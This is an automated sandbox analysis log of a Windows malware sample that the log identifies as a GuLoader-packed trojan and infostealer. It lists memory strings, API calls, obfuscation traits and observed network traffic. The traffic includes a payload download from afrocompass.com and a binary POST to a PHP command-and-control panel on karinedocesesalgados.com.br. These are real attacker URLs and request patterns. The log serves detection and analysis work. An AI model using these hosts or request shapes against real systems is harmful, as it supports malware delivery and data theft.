          Source: 2GirCpksIO.exe, 00000005.00000003.6649688064.0000000000899000.00000004.00000001.sdmp, lsass.exe, 0000000A.00000000.6703150220.000001CE61A9B000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: 2GirCpksIO.exe, 00000005.00000003.6649688064.0000000000899000.00000004.00000001.sdmp, lsass.exe, 0000000A.00000000.6703150220.000001CE61A9B000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: lsass.exe, 0000000A.00000000.6719182560.000001CE61A00000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
          Source: lsass.exe, 0000000A.00000000.6703362780.000001CE61ACA000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: lsass.exe, 0000000A.00000002.10836282788.000001CE61C39000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
          Source: lsass.exe, 0000000A.00000002.10836282788.000001CE61C39000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
          Source: lsass.exe, 0000000A.00000000.6719182560.000001CE61A00000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/ssca-sha2-g7.crl0/
          Source: lsass.exe, 0000000A.00000002.10836282788.000001CE61C39000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
          Source: lsass.exe, 0000000A.00000000.6719182560.000001CE61A00000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
          Source: lsass.exe, 0000000A.00000000.6703362780.000001CE61ACA000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: lsass.exe, 0000000A.00000002.10836282788.000001CE61C39000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
          Source: lsass.exe, 0000000A.00000000.6719182560.000001CE61A00000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/ssca-sha2-g7.crl0
          Source: lsass.exe, 0000000A.00000000.6712294981.000001CE61B74000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
          Source: lsass.exe, 0000000A.00000002.10832834638.000001CE614D0000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
          Source: lsass.exe, 0000000A.00000000.6701087559.000001CE6142F000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
          Source: lsass.exe, 0000000A.00000000.6718254573.000001CE61451000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
          Source: lsass.exe, 0000000A.00000000.6719182560.000001CE61A00000.00000004.00000001.sdmp, lsass.exe, 0000000A.00000000.6701087559.000001CE6142F000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
          Source: lsass.exe, 0000000A.00000000.6719182560.000001CE61A00000.00000004.00000001.sdmp, lsass.exe, 0000000A.00000002.10836282788.000001CE61C39000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: lsass.exe, 0000000A.00000002.10836282788.000001CE61C39000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
          Source: lsass.exe, 0000000A.00000000.6719182560.000001CE61A00000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0F
          Source: lsass.exe, 0000000A.00000002.10836282788.000001CE61C39000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0H
          Source: lsass.exe, 0000000A.00000002.10836282788.000001CE61C39000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
          Source: UserOOBEBroker.exe, 00000004.00000002.10830879380.000001C6E8B00000.00000002.00020000.sdmpString found in binary or memory: http://schemas.microso
          Source: lsass.exe, 0000000A.00000000.6719182560.000001CE61A00000.00000004.00000001.sdmp, lsass.exe, 0000000A.00000000.6700942689.000001CE61413000.00000004.00000001.sdmp, lsass.exe, 0000000A.00000002.10833511138.000001CE61A00000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
          Source: lsass.exe, 0000000A.00000000.6718254573.000001CE61451000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
          Source: lsass.exe, 0000000A.00000000.6718254573.000001CE61451000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
          Source: lsass.exe, 0000000A.00000000.6701087559.000001CE6142F000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: lsass.exe, 0000000A.00000000.6701087559.000001CE6142F000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
          Source: lsass.exe, 0000000A.00000000.6701087559.000001CE6142F000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
          Source: lsass.exe, 0000000A.00000000.6719182560.000001CE61A00000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/CPS0
          Source: lsass.exe, 0000000A.00000002.10836282788.000001CE61C39000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/CPS0~
          Source: lsass.exe, 0000000A.00000002.10833511138.000001CE61A00000.00000004.00000001.sdmpString found in binary or memory: http://www.live.com
          Source: lsass.exe, 0000000A.00000002.10833511138.000001CE61A00000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com
          Source: 2GirCpksIO.exe, 00000005.00000002.10831731401.000000000082E000.00000004.00000020.sdmpString found in binary or memory: https://afrocompass.com/c
          Source: 2GirCpksIO.exe, 00000005.00000002.10831731401.000000000082E000.00000004.00000020.sdmpString found in binary or memory: https://afrocompass.com/k
          Source: 2GirCpksIO.exe, 00000005.00000002.10832026164.0000000000859000.00000004.00000020.sdmp, 2GirCpksIO.exe, 00000005.00000002.10834416803.0000000002420000.00000004.00000001.sdmpString found in binary or memory: https://afrocompass.com/karinedocesesalgados_HpiSWwhaod1.bin
          Source: 2GirCpksIO.exe, 00000005.00000002.10832026164.0000000000859000.00000004.00000020.sdmpString found in binary or memory: https://afrocompass.com/karinedocesesalgados_HpiSWwhaod1.bin0;
          Source: 2GirCpksIO.exe, 00000005.00000002.10831731401.000000000082E000.00000004.00000020.sdmpString found in binary or memory: https://afrocompass.com/karinedocesesalgados_HpiSWwhaod1.bin_
          Source: 2GirCpksIO.exe, 00000005.00000002.10832583099.0000000000898000.00000004.00000020.sdmp, 2GirCpksIO.exe, 00000005.00000003.6933085805.0000000000898000.00000004.00000001.sdmpString found in binary or memory: https://karinedocesesalgados.com.br/nedo/five/fre.php
          Source: 2GirCpksIO.exe, 00000005.00000003.6650584168.000000001E520000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/
          Source: 2GirCpksIO.exe, 00000005.00000003.6650584168.000000001E520000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com//
          Source: 2GirCpksIO.exe, 00000005.00000003.6650584168.000000001E520000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
          Source: 2GirCpksIO.exe, 00000005.00000003.6650584168.000000001E520000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/v104
          Source: lsass.exe, 0000000A.00000000.6719182560.000001CE61A00000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
          Source: unknownHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 178Connection: close
          Source: unknownDNS traffic detected: queries for: afrocompass.com
          Source: global trafficHTTP traffic detected: GET /karinedocesesalgados_HpiSWwhaod1.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: afrocompass.comCache-Control: no-cache
          Source: unknownHTTPS traffic detected: 68.66.226.70:443 -> 192.168.11.20:49787 version: TLS 1.2

          System Summary:

          barindex
          Potential malicious icon foundShow sources
          Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
          Source: 2GirCpksIO.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_02D202D0
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_02D1BE72
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_02D1BA6E
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_02D218A6
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_02D1B688
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_02D1F7F8
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_02D1C399
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_02D1E876
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_02D1EC0A
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_02D202D0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_02D1BE72 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_02D1BA6E NtWriteVirtualMemory,CreateFileA,
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_02D211D4 NtProtectVirtualMemory,
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_02D1F7F8 NtWriteVirtualMemory,LoadLibraryA,
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess Stats: CPU usage > 98%
          Source: 2GirCpksIO.exe, 00000001.00000002.6229227399.000000000041B000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSORNER.exe vs 2GirCpksIO.exe
          Source: 2GirCpksIO.exe, 00000005.00000000.6223816198.000000000041B000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSORNER.exe vs 2GirCpksIO.exe
          Source: 2GirCpksIO.exeBinary or memory string: OriginalFilenameSORNER.exe vs 2GirCpksIO.exe
          Source: 2GirCpksIO.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Users\user\Desktop\2GirCpksIO.exeSection loaded: edgegdi.dll
          Source: C:\Windows\System32\oobe\UserOOBEBroker.exeSection loaded: edgegdi.dll
          Source: C:\Users\user\Desktop\2GirCpksIO.exeSection loaded: edgegdi.dll
          Source: 2GirCpksIO.exeVirustotal: Detection: 32%
          Source: 2GirCpksIO.exeReversingLabs: Detection: 20%
          Source: 2GirCpksIO.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\2GirCpksIO.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Users\user\Desktop\2GirCpksIO.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
          Source: unknownProcess created: C:\Users\user\Desktop\2GirCpksIO.exe "C:\Users\user\Desktop\2GirCpksIO.exe"
          Source: unknownProcess created: C:\Windows\System32\oobe\UserOOBEBroker.exe C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess created: C:\Users\user\Desktop\2GirCpksIO.exe "C:\Users\user\Desktop\2GirCpksIO.exe"
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess created: C:\Users\user\Desktop\2GirCpksIO.exe "C:\Users\user\Desktop\2GirCpksIO.exe"
          Source: C:\Windows\System32\oobe\UserOOBEBroker.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\InProcServer32
          Source: C:\Users\user\Desktop\2GirCpksIO.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3425316567-2969588382-3778222414-1001\1b1d0082738e9f9011266f86ab9723d2_11389406-0377-47ed-98c7-d564e683c6ebJump to behavior
          Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@4/4@2/2
          Source: C:\Users\user\Desktop\2GirCpksIO.exeMutant created: \Sessions\1\BaseNamedObjects\28278665D4ACB73EF64D459A
          Source: C:\Users\user\Desktop\2GirCpksIO.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

          Data Obfuscation:

          barindex
          Yara detected GuLoaderShow sources
          Source: Yara matchFile source: 00000005.00000000.6227819814.0000000000560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.6231878648.0000000002D10000.00000040.00000001.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_00407447 push esi; ret
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_004084D6 push ebp; retf
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_0040688C pushfd ; iretd
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_0040856E push ebp; retf
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_00404572 push ecx; ret
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_004091FD push ss; retf
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_0040798C pushfd ; ret
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_004085A1 push ebp; retf
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_004059BD pushad ; retf 0008h
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_00405EA9 push edi; retf
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_0040937F push FFFFFFDFh; ret
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_00408325 push dword ptr [edi]; ret
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_00407B9F push esi; ret
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_00561EF5 push edx; ret
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_00561054 push edx; ret
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_00562854 push edx; ret
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_00564054 push edx; ret
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_00567054 push edx; ret
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_00565855 push edx; ret
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_00566844 push edx; ret
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_00560843 push edx; ret
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_00562043 push edx; ret
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_00563843 push edx; ret
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_00565043 push edx; ret
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_00562074 push edx; ret
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_00563874 push edx; ret
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_00565074 push edx; ret
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_00566875 push edx; ret
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_00560878 push edx; ret
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_00566065 push edx; ret
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_00563063 push edx; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 6.86127779315
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
